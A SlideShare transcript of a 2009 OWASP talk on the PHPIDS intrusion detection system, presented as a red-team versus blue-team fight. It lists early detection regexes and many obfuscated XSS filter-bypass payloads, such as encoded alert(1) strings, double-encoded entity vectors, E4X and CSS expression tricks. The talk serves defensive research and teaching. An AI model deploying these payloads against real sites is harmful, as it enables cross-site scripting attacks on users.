The Ultimate IDS Smackdown

Mario Heiderich
Mario HeiderichSecurity Research / Penetration Testing
A hopefully amusing and edutaining talk by  Gareth Heyes and Mario Heiderich  for OWASP London, 07.2009
Who are we? Gareth Heyes Founder of Businessinfo web security Contracts for Microsoft testing the XSS filter Creator of Hackvertor & other security tools Enjoys hacking Javascript  Mario Heiderich  Co-founder and lead-dev of the PHPIDS Websecurity and secure development geek CTO for Business IN Inc. Freelance security researcher Believes in the infinite power of markup
What... is this talk? A short intro in the PHPIDS A travel from the very beginning to today's state Accompanied by a constant state of "being owned" ...positive ownage  ...and details on the ownage Some words on red vs. blue situations in (web) security And a conclusion that maybe might  ... change or view on web security  ... help some to get out of their boxes ... and discover values greater than proprietary And ... a rather dirty and sweaty cage fight
In the blue corner... Announces a new IDS approach  Thinks it knows the web after years of experience Did read a lot of PDFs about the interwebs - even clicked once or twice on what appeared to be a link. 
In the red corner... Thinks blue team is crazy Doubts that blacklists can detect attacks Placed the malicious link the blue team courageously clicked on Was told by (had to be removed) in a dream it knows everything Likes the Matrix
Some history lessons First PHPIDS version - the 0.0.1  from 03/2007 (["|'][s]*>) //finds html breaking injections including whitespace attacks (["|'][s]*<) //finds attribute breaking injections including whitespace attacks (+A[w]{2}-) //finds utf7 attacks in general (&#[w]+) //detects all entitites including the bizarro IE US-ASCII entitites ([w]{3}) //detects the IE hex entities (("|')[s]*()|})) //finds closing javascript breaker including whitespace attacks (((|{)[s]*("|')) //finds opening javascript breaker including whitespace attacks (../..) //detects basic directory traversal (%[w]{2}) //detects urlencoded attacks (=//) //detects protocol relative url inclusions (¼/) //detects US-ASCII HTML breaking code (@import|;base64|alert() //detects imported poisoned stylesheets, base64 attacks and all alerts (>[w]=/) //detects malformed attribute utilizing script includes ((?<)|()>)) //detects nullparam and numeric includes Receives sympathy bonus for being so adorable!  It didn't even have a name back then...
Any good fighter requires the right tools Enter the PHP Charset Encoder Converts charsets Encoding and conversion Entities & lots of them Is it enough? Hackvertor Inspired by the PCE Layered encoding Tag based conversion JS fuzzing & testing Enables crazy vector creation
Lets get ready to rumble....
First round of the fight It didn't look too bad for the blue team Life was easy back them Some simple "><script>alert(/XSS/)</script> And a little bit of 'OR1=1-- The simple and bright world of kindergarten-level injections If we don't know obfuscation, it does not exist!    But then...
Inside the script tag Sirdarckcat's innocent question:-   "Why not detect all forms of attack? Insert a script tag and detect malicious code" The blue team said yes... All hell broke loose...
It all began with strings s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+''; s4=''==''?':': 0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8 _=alert,1,1,_(1); c4=1==1&&'(1)';c3=1==1&&'aler'; c2=1==1&&':';c1=1==1&&'javascript'; a=c1+c2+c3+'t'+c4;(URL=a);
How many ways to create a string? Single/double quotes Regular expressions Arrays are strings Array constructors are strings Firefox specific hacks Backslash multiline strings DOM properties galore E4X Octal, unicode hex Escapes
alert(1) examples Octal, hex and Unicode escapes:- '141154145162164506151' 'x61x6cx65x72x74x28x31x29' 'u0061u006cu0065u0072u0074u0028u0031u0029' RegExps:- /alert(1)/.source /alert(1)/[-1] // FF only E4X:- <>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</> <>&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</>
Browser bugs are your friend Firefox 2 supported encoding of parenthesis using unicode escapes. alert(1)== u0061u006cu0065u0072u0074u0028u0031u0029 E4X - every object has e4x properties! Bug? (!1..@*::abc?alert:1..@*::xyz)(1) Eval method linked to every object, that was fun (0)['eval']('alert(1)') Data URLs used to inherit domain injected on - sometimes they still do
So - what to do at this point? What do you say blue team? Give up? Or.. maybe...give up? Or... Face the problem and canonicalize!
We chose... The latter Because of the breast-hair (native - not implanted). And introduced the Converter That was around late spring 2008 May 2008 to precise in rev .899 We could now convert and canonicalize the strings before hitting the rules Keeping the core rules slim - and the blue team prepared for more vector madness
Time for entity and encoding fun.... Oh noez - the red team reacts! Malformed entities Zero padded Mixed hex/dec Encoded data urls Base64 - fun fact: that really generated headaches for the blue team Unexpected unicode characters Unicode spaces  Allowed padding   a&#8205lert(1) // FF2 stuff ale&zwj;rt(1) // Zero width joiner FF2
Entity fun continued.... Double encoded entities <isindex/type=image xyz=&lt; iframe/src=javascript&amp;#x3a&amp; #x61lert&amp;#x28&amp;#x31&amp;#x29&gt; onerror=undefined,///,outerHTML=xyz src=1> <img title=javascript:&amp;#97lert(1) src="x" alt="y"onerror=undefined,[undefined, [UR&#76&#61title],undefined]>
Forgotten features Getters/Setters  o={b setter:Function}.b='alertx28x31x29'; new o Language attribute IE  <body/id="1"onload=MsgBox+"xss" language=vbs> Data Islands, HTC, HTA... Ways to change the location  Detect location=name w/o false alerts for a start JS based CSS expressions document.styleSheets(0).cssText=name HTML encoded comments in javascript! <body onload=&lt;!--&#10alert(1)>
Pre-implemented future features and standards Video/Audio tags New events onurlflip, ononline, onbounce, oncellchange... CSS Expression closures Array extras New String functions E4X self injecting vectors - Bypasses Mozilla CSP <html><head> <title>CSP e4x injection</title> <script src="#"></script> </head><body>{alert(1)}</body></html>
JavaScript is weird Math operations on functions +alert(1);alert(1)++;.1.*in<></>in{}in[] in~alert('mmmmm js weirdness')++in~[] Strings out of large numbers top[(Number.MAX_VALUE/45268).toString(36). slice(15,19)]((Number.MAX_VALUE/99808). toString(36).slice(71,76)+'("XSS")') Getting window (0,[].sort)();(1,[].reverse)();// FF only Yosuke Hasegawa script without a-z0-9  (Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç [È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å) Expressions <div style="00078073 s:e&#92&#120p&#47;&#42;&#106;&#42;&#47; 0007200065 ssion(window.x?0:(alert(/XSS/),window.x=1));"></div>
Ssso, what did we learn today
You'll never get what you expect Defending against the stuff you know doesn't make you safe Web technologies are rocket science, browsers are monsters Building an IDS is no fire and forget job
Web technologies aren't pandora's box... they just support it too
An IDS is a constantly evolving middleware Cover the RFCs, brower capabilities, web app peculiarities, encoding quirks, application bugs, etc. etc. There is no golden path to stride on Long release cycles are a no-go Stable trunk versus monthly releases
Community IDS versus commercial products Where are the smoketests, where are the challenges Where's the hive mind knowledge Utilizing pressure for better product quality Faster fixes New approaches Better communication with users amd attackers And a lot of WAFs with questionable XSS protection  No vendor names.. no worries :) WafW00f, XSS on vendor sites, obvious circumventions
Quintessence »Bruce Schneier«
Maybe... Security - especially web sec is no lone wolf mission Locking away the rules and best practices don't always work Without community support it's hard to create a grown and capable product Link with the attackers
Generate communities  and challenges It's a win-win anyway The vulnerabilities are in the design - patches can't heal the patient Give credit and admit that 100% security just ain't possible Spread knowledge to avoid having it wither
Credits Talking about credits  Thanks to  Christian, Lars, sdc, thornmaker, ma1, lightos, Reiners, Kishor, Martin Hinks,tx, rvdh, beford, the Schokokeks team and all the other people who helped building, attacking and hardening the PHPIDS... And why not give us a small visit http://php-ids.org http://thespanner.co.uk http://sla.ckers.org/forum/list.php?24
That's it for now - thanks!   Red team couldn't resist.....   Image() . ownerDocument . documentElement . innerHTML+=name The red team - attempting to infiltrate the blue team's camp
1 of 31

The Ultimate IDS Smackdown

Download to read offline
TechnologyEntertainment & Humor
Mario Heiderich
Mario HeiderichSecurity Research / Penetration Testing

Recommended

The Future of Web Attacks - CONFidence 2010 by
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
2.9K views36 slides
Locking the Throneroom 2.0 by
Locking the Throneroom 2.0Locking the Throneroom 2.0
Locking the Throneroom 2.0Mario Heiderich
6.4K views47 slides
A XSSmas carol by
A XSSmas carolA XSSmas carol
A XSSmas carolcgvwzq
4K views36 slides
Scriptless Attacks - Stealing the Pie without touching the Sill by
Scriptless Attacks - Stealing the Pie without touching the SillScriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the SillMario Heiderich
45.7K views33 slides
In the DOM, no one will hear you scream by
In the DOM, no one will hear you screamIn the DOM, no one will hear you scream
In the DOM, no one will hear you screamMario Heiderich
33.2K views60 slides
Generic Attack Detection - ph-Neutral 0x7d8 by
Generic Attack Detection - ph-Neutral 0x7d8Generic Attack Detection - ph-Neutral 0x7d8
Generic Attack Detection - ph-Neutral 0x7d8Mario Heiderich
1.5K views21 slides

More Related Content

What's hot

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ... by
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
3.2K views40 slides
I thought you were my friend - Malicious Markup by
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
3.6K views65 slides
The innerHTML Apocalypse by
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML ApocalypseMario Heiderich
34.9K views51 slides
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-... by
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
30.4K views55 slides
HTML5 - The Good, the Bad, the Ugly by
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
2K views22 slides
An Abusive Relationship with AngularJS by
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJSMario Heiderich
129.2K views66 slides

What's hot(20)

Locking the Throne Room - How ES5+ might change views on XSS and Client Side ... by Mario Heiderich
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Mario Heiderich3.2K views
I thought you were my friend - Malicious Markup by Mario Heiderich
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich3.6K views
The innerHTML Apocalypse by Mario Heiderich
The innerHTML ApocalypseThe innerHTML Apocalypse
The innerHTML Apocalypse
Mario Heiderich34.9K views
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-... by Mario Heiderich
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Mario Heiderich30.4K views
HTML5 - The Good, the Bad, the Ugly by Mario Heiderich
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
Mario Heiderich2K views
An Abusive Relationship with AngularJS by Mario Heiderich
An Abusive Relationship with AngularJSAn Abusive Relationship with AngularJS
An Abusive Relationship with AngularJS
Mario Heiderich129.2K views
JavaScript From Hell - CONFidence 2.0 2009 by Mario Heiderich
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
Mario Heiderich21.9K views
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,... by Mario Heiderich
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
Mario Heiderich45.4K views
Breaking AngularJS Javascript sandbox by Mathias Karlsson
Breaking AngularJS Javascript sandboxBreaking AngularJS Javascript sandbox
Breaking AngularJS Javascript sandbox
Mathias Karlsson2.2K views
Building Advanced XSS Vectors by Rodolfo Assis (Brute)
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)7.8K views
Polyglot payloads in practice by avlidienbrunn at HackPra by Mathias Karlsson
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson14.5K views
Defcon 20-zulla-improving-web-vulnerability-scanning by zulla
Defcon 20-zulla-improving-web-vulnerability-scanningDefcon 20-zulla-improving-web-vulnerability-scanning
Defcon 20-zulla-improving-web-vulnerability-scanning
zulla557 views
Developer's Guide to JavaScript and Web Cryptography by Kevin Hakanson
Developer's Guide to JavaScript and Web CryptographyDeveloper's Guide to JavaScript and Web Cryptography
Developer's Guide to JavaScript and Web Cryptography
Kevin Hakanson30.8K views
XSS - Do you know EVERYTHING? by Yurii Bilyk
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk4.8K views
Reverse Engineering Malicious Javascript by Yusuf Motiwala
Reverse Engineering Malicious JavascriptReverse Engineering Malicious Javascript
Reverse Engineering Malicious Javascript
Yusuf Motiwala7.4K views
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen... by MMT - Multimediatreff
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT - Multimediatreff2K views
Mario heiderich. got your nose! how to steal your precious data without using... by Yury Chemerkin
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
Yury Chemerkin1.5K views
Automated JavaScript Deobfuscation - PacSec 2007 by Stephan Chenette
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
Stephan Chenette1.5K views
Security and why you need to review yours. by David Busby, CISSP
Security and why you need to review yours.Security and why you need to review yours.
Security and why you need to review yours.
David Busby, CISSP9.9K views
Clean Code by ISchwarz23
Clean CodeClean Code
Clean Code
ISchwarz231.8K views

Similar to The Ultimate IDS Smackdown

OWASP PHPIDS talk slides by
OWASP PHPIDS talk slidesOWASP PHPIDS talk slides
OWASP PHPIDS talk slidesguestd34230
837 views35 slides
Pki by Steve Lamb by
Pki by Steve LambPki by Steve Lamb
Pki by Steve LambInformation Security Awareness Group
1.4K views39 slides
Hackers vs developers by
Hackers vs developersHackers vs developers
Hackers vs developersSoumyasanto Sen
1.2K views36 slides
[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜 by
[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜
[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜Seungmin Shin
2.4K views98 slides
BCS_PKI_part1.ppt by
BCS_PKI_part1.pptBCS_PKI_part1.ppt
BCS_PKI_part1.pptUskuMusku1
4 views39 slides
[Wroclaw #7] Why So Serial? by
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?OWASP
463 views75 slides

Similar to The Ultimate IDS Smackdown(20)

OWASP PHPIDS talk slides by guestd34230
OWASP PHPIDS talk slidesOWASP PHPIDS talk slides
OWASP PHPIDS talk slides
guestd34230837 views
Pki by Steve Lamb by Information Security Awareness Group
Pki by Steve LambPki by Steve Lamb
Pki by Steve Lamb
Information Security Awareness Group1.4K views
Hackers vs developers by Soumyasanto Sen
Hackers vs developersHackers vs developers
Hackers vs developers
Soumyasanto Sen1.2K views
[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜 by Seungmin Shin
[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜
[KGC 2010] 게임과 보안, 암호 알고리즘과 프로토콜
Seungmin Shin2.4K views
BCS_PKI_part1.ppt by UskuMusku1
BCS_PKI_part1.pptBCS_PKI_part1.ppt
BCS_PKI_part1.ppt
UskuMusku14 views
[Wroclaw #7] Why So Serial? by OWASP
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
OWASP463 views
Positive Technologies - S4 - Scada under x-rays by qqlan
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
qqlan5.7K views
2 Roads to Redemption - Thoughts on XSS and SQLIA by guestfdcb8a
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
guestfdcb8a453 views
Security & Cryptography In Linux by Ahmed Mekkawy
Security & Cryptography In LinuxSecurity & Cryptography In Linux
Security & Cryptography In Linux
Ahmed Mekkawy3.2K views
주로사용되는 Xss필터와 이를 공격하는 방법 by guestad13b55
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
guestad13b555.9K views
Trust boundaries - Confidence 2015 by Logicaltrust pl
Trust boundaries - Confidence 2015Trust boundaries - Confidence 2015
Trust boundaries - Confidence 2015
Logicaltrust pl804 views
SQL/JavaScript Hybrid Worms As Two-stage Quines by José Ignacio
SQL/JavaScript Hybrid Worms As Two-stage Quines SQL/JavaScript Hybrid Worms As Two-stage Quines
SQL/JavaScript Hybrid Worms As Two-stage Quines
José Ignacio419 views
Simplest-Ownage-Human-Observed… - Routers by Logicaltrust pl
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
Logicaltrust pl2.5K views
Filip palian mateuszkocielski. simplest ownage human observed… routers by Yury Chemerkin
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
Yury Chemerkin729 views
Security module for php7 – Killing bugclasses and virtual-patching the rest! ... by 44CON
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
44CON227 views
Applied machine learning defeating modern malicious documents by Priyanka Aash
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documents
Priyanka Aash314 views
Black ops of tcp2005 japan by Dan Kaminsky
Black ops of tcp2005 japanBlack ops of tcp2005 japan
Black ops of tcp2005 japan
Dan Kaminsky6.6K views
How to hide your browser 0-days by Zoltan Balazs
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
Zoltan Balazs2.3K views
How to write clean & testable code without losing your mind by Andreas Czakaj
How to write clean & testable code without losing your mindHow to write clean & testable code without losing your mind
How to write clean & testable code without losing your mind
Andreas Czakaj225 views
Blue team reboot - HackFest by Haydn Johnson
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
Haydn Johnson592 views

Recently uploaded

PRODUCT LISTING.pptx by
PRODUCT LISTING.pptxPRODUCT LISTING.pptx
PRODUCT LISTING.pptxangelicacueva6
14 views1 slide
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLive by
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLiveAutomating a World-Class Technology Conference; Behind the Scenes of CiscoLive
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLiveNetwork Automation Forum
31 views35 slides
ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ... by
ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ...ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ...
ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ...Jasper Oosterveld
18 views49 slides
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas... by
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...Bernd Ruecker
37 views69 slides
Evolving the Network Automation Journey from Python to Platforms by
Evolving the Network Automation Journey from Python to PlatformsEvolving the Network Automation Journey from Python to Platforms
Evolving the Network Automation Journey from Python to PlatformsNetwork Automation Forum
13 views21 slides
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N... by
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...James Anderson
85 views32 slides

Recently uploaded(20)

PRODUCT LISTING.pptx by angelicacueva6
PRODUCT LISTING.pptxPRODUCT LISTING.pptx
PRODUCT LISTING.pptx
angelicacueva614 views
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLive by Network Automation Forum
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLiveAutomating a World-Class Technology Conference; Behind the Scenes of CiscoLive
Automating a World-Class Technology Conference; Behind the Scenes of CiscoLive
Network Automation Forum31 views
ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ... by Jasper Oosterveld
ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ...ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ...
ESPC 2023 - Protect and Govern your Sensitive Data with Microsoft Purview in ...
Jasper Oosterveld18 views
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas... by Bernd Ruecker
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...
iSAQB Software Architecture Gathering 2023: How Process Orchestration Increas...
Bernd Ruecker37 views
Evolving the Network Automation Journey from Python to Platforms by Network Automation Forum
Evolving the Network Automation Journey from Python to PlatformsEvolving the Network Automation Journey from Python to Platforms
Evolving the Network Automation Journey from Python to Platforms
Network Automation Forum13 views
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N... by James Anderson
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
GDG Cloud Southlake 28 Brad Taylor and Shawn Augenstein Old Problems in the N...
James Anderson85 views
Voice Logger - Telephony Integration Solution at Aegis by Nirmal Sharma
Voice Logger - Telephony Integration Solution at AegisVoice Logger - Telephony Integration Solution at Aegis
Voice Logger - Telephony Integration Solution at Aegis
Nirmal Sharma39 views
SUPPLIER SOURCING.pptx by angelicacueva6
SUPPLIER SOURCING.pptxSUPPLIER SOURCING.pptx
SUPPLIER SOURCING.pptx
angelicacueva615 views
STKI Israeli Market Study 2023 corrected forecast 2023_24 v3.pdf by Dr. Jimmy Schwarzkopf
STKI Israeli Market Study 2023 corrected forecast 2023_24 v3.pdfSTKI Israeli Market Study 2023 corrected forecast 2023_24 v3.pdf
STKI Israeli Market Study 2023 corrected forecast 2023_24 v3.pdf
Dr. Jimmy Schwarzkopf19 views
virtual reality.pptx by G036GaikwadSnehal
virtual reality.pptxvirtual reality.pptx
virtual reality.pptx
G036GaikwadSnehal11 views
Business Analyst Series 2023 - Week 3 Session 5 by DianaGray10
Business Analyst Series 2023 - Week 3 Session 5Business Analyst Series 2023 - Week 3 Session 5
Business Analyst Series 2023 - Week 3 Session 5
DianaGray10248 views
Data Integrity for Banking and Financial Services by Precisely
Data Integrity for Banking and Financial ServicesData Integrity for Banking and Financial Services
Data Integrity for Banking and Financial Services
Precisely21 views
Vertical User Stories by Moisés Armani Ramírez
Vertical User StoriesVertical User Stories
Vertical User Stories
Moisés Armani Ramírez14 views
PRODUCT PRESENTATION.pptx by angelicacueva6
PRODUCT PRESENTATION.pptxPRODUCT PRESENTATION.pptx
PRODUCT PRESENTATION.pptx
angelicacueva614 views
Future of Indian ConsumerTech by Kapil Khandelwal (KK)
Future of Indian ConsumerTechFuture of Indian ConsumerTech
Future of Indian ConsumerTech
Kapil Khandelwal (KK)21 views
METHOD AND SYSTEM FOR PREDICTING OPTIMAL LOAD FOR WHICH THE YIELD IS MAXIMUM ... by Prity Khastgir IPR Strategic India Patent Attorney Amplify Innovation
METHOD AND SYSTEM FOR PREDICTING OPTIMAL LOAD FOR WHICH THE YIELD IS MAXIMUM ...METHOD AND SYSTEM FOR PREDICTING OPTIMAL LOAD FOR WHICH THE YIELD IS MAXIMUM ...
METHOD AND SYSTEM FOR PREDICTING OPTIMAL LOAD FOR WHICH THE YIELD IS MAXIMUM ...
Prity Khastgir IPR Strategic India Patent Attorney Amplify Innovation29 views
Empathic Computing: Delivering the Potential of the Metaverse by Mark Billinghurst
Empathic Computing: Delivering the Potential of the MetaverseEmpathic Computing: Delivering the Potential of the Metaverse
Empathic Computing: Delivering the Potential of the Metaverse
Mark Billinghurst478 views
Design Driven Network Assurance by Network Automation Forum
Design Driven Network AssuranceDesign Driven Network Assurance
Design Driven Network Assurance
Network Automation Forum15 views
Case Study Copenhagen Energy and Business Central.pdf by Aitana
Case Study Copenhagen Energy and Business Central.pdfCase Study Copenhagen Energy and Business Central.pdf
Case Study Copenhagen Energy and Business Central.pdf
Aitana16 views
Unit 1_Lecture 2_Physical Design of IoT.pdf by StephenTec
Unit 1_Lecture 2_Physical Design of IoT.pdfUnit 1_Lecture 2_Physical Design of IoT.pdf
Unit 1_Lecture 2_Physical Design of IoT.pdf
StephenTec12 views

The Ultimate IDS Smackdown

  • 1. A hopefully amusing and edutaining talk by  Gareth Heyes and Mario Heiderich  for OWASP London, 07.2009
  • 2. Who are we? Gareth Heyes Founder of Businessinfo web security Contracts for Microsoft testing the XSS filter Creator of Hackvertor & other security tools Enjoys hacking Javascript  Mario Heiderich  Co-founder and lead-dev of the PHPIDS Websecurity and secure development geek CTO for Business IN Inc. Freelance security researcher Believes in the infinite power of markup
  • 3. What... is this talk? A short intro in the PHPIDS A travel from the very beginning to today's state Accompanied by a constant state of "being owned" ...positive ownage  ...and details on the ownage Some words on red vs. blue situations in (web) security And a conclusion that maybe might  ... change or view on web security  ... help some to get out of their boxes ... and discover values greater than proprietary And ... a rather dirty and sweaty cage fight
  • 4. In the blue corner... Announces a new IDS approach  Thinks it knows the web after years of experience Did read a lot of PDFs about the interwebs - even clicked once or twice on what appeared to be a link. 
  • 5. In the red corner... Thinks blue team is crazy Doubts that blacklists can detect attacks Placed the malicious link the blue team courageously clicked on Was told by (had to be removed) in a dream it knows everything Likes the Matrix
  • 6. Some history lessons First PHPIDS version - the 0.0.1  from 03/2007 (["|'][s]*>) //finds html breaking injections including whitespace attacks (["|'][s]*<) //finds attribute breaking injections including whitespace attacks (+A[w]{2}-) //finds utf7 attacks in general (&#[w]+) //detects all entitites including the bizarro IE US-ASCII entitites ([w]{3}) //detects the IE hex entities (("|')[s]*()|})) //finds closing javascript breaker including whitespace attacks (((|{)[s]*("|')) //finds opening javascript breaker including whitespace attacks (../..) //detects basic directory traversal (%[w]{2}) //detects urlencoded attacks (=//) //detects protocol relative url inclusions (¼/) //detects US-ASCII HTML breaking code (@import|;base64|alert() //detects imported poisoned stylesheets, base64 attacks and all alerts (>[w]=/) //detects malformed attribute utilizing script includes ((?<)|()>)) //detects nullparam and numeric includes Receives sympathy bonus for being so adorable!  It didn't even have a name back then...
  • 7. Any good fighter requires the right tools Enter the PHP Charset Encoder Converts charsets Encoding and conversion Entities & lots of them Is it enough? Hackvertor Inspired by the PCE Layered encoding Tag based conversion JS fuzzing & testing Enables crazy vector creation
  • 8. Lets get ready to rumble....
  • 9. First round of the fight It didn't look too bad for the blue team Life was easy back them Some simple "><script>alert(/XSS/)</script> And a little bit of 'OR1=1-- The simple and bright world of kindergarten-level injections If we don't know obfuscation, it does not exist!    But then...
  • 10. Inside the script tag Sirdarckcat's innocent question:-   "Why not detect all forms of attack? Insert a script tag and detect malicious code" The blue team said yes... All hell broke loose...
  • 11. It all began with strings s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+''; s4=''==''?':': 0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8 _=alert,1,1,_(1); c4=1==1&&'(1)';c3=1==1&&'aler'; c2=1==1&&':';c1=1==1&&'javascript'; a=c1+c2+c3+'t'+c4;(URL=a);
  • 12. How many ways to create a string? Single/double quotes Regular expressions Arrays are strings Array constructors are strings Firefox specific hacks Backslash multiline strings DOM properties galore E4X Octal, unicode hex Escapes
  • 13. alert(1) examples Octal, hex and Unicode escapes:- '141154145162164506151' 'x61x6cx65x72x74x28x31x29' 'u0061u006cu0065u0072u0074u0028u0031u0029' RegExps:- /alert(1)/.source /alert(1)/[-1] // FF only E4X:- <>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</> <>&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</>
  • 14. Browser bugs are your friend Firefox 2 supported encoding of parenthesis using unicode escapes. alert(1)== u0061u006cu0065u0072u0074u0028u0031u0029 E4X - every object has e4x properties! Bug? (!1..@*::abc?alert:1..@*::xyz)(1) Eval method linked to every object, that was fun (0)['eval']('alert(1)') Data URLs used to inherit domain injected on - sometimes they still do
  • 15. So - what to do at this point? What do you say blue team? Give up? Or.. maybe...give up? Or... Face the problem and canonicalize!
  • 16. We chose... The latter Because of the breast-hair (native - not implanted). And introduced the Converter That was around late spring 2008 May 2008 to precise in rev .899 We could now convert and canonicalize the strings before hitting the rules Keeping the core rules slim - and the blue team prepared for more vector madness
